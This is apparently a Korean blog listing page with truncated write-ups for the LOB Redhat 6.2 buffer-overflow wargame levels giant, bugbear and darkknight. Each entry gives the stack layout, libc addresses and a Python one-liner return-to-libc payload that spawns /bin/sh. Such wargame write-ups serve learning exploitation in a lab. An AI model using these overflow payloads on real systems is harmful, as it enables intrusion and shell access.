LOB Redhat 6.2 - giant giant - no stack, no RTLStack : buffer[40] + sfp[4] + ret[4]ret : 0x804851e system : 0x40058ae0 exit : 0x400391e0 "/bin/sh" : 0x400fbff9Payload : ./assassin `python -c 'print "A"*44 + "\x1e\x85\x04\x08" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"'` Using Ret sled + RTL 더보기 LOB Redhat 6.2 - bugbear bugbear - RTL2stack : *ret[4] + *execve_addr[4] + *execve_offset[4] + *lib_addr[4] + *fp[4] + buffer[40] + sfp[4] + ret[4]1execve : 0x400a9d48 exit : 0x400391e0evecve(filename, *argv[], 0) -> execve("/bin/sh", &"/bin/sh", \x00, &NULL)Symbolic Link : ln -s giant `python -c 'print "\xf9\xbf\x0f\x40"'` (address of "/bin/sh")"/bin/sh" : 0x400fbff9 &"/bin/sh", \x00 : 0xbffffff7 &NULL : 0xbffffffcPayl.. 더보기 LOB Redhat 6.2 - darkknight darkknight - RTL1Stack : i[4] + buffer[40] + sfp[4] + ret[4]system : 0x40058ae0 exit : 0x400391e0return address : 0x40058ae0Payload : ./bugbear `python -c 'print "A"*44 + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"'`binsh.c : Using RTL 더보기 이전 1 ··· 58 59 60 61 62 63 64 ··· 75 다음
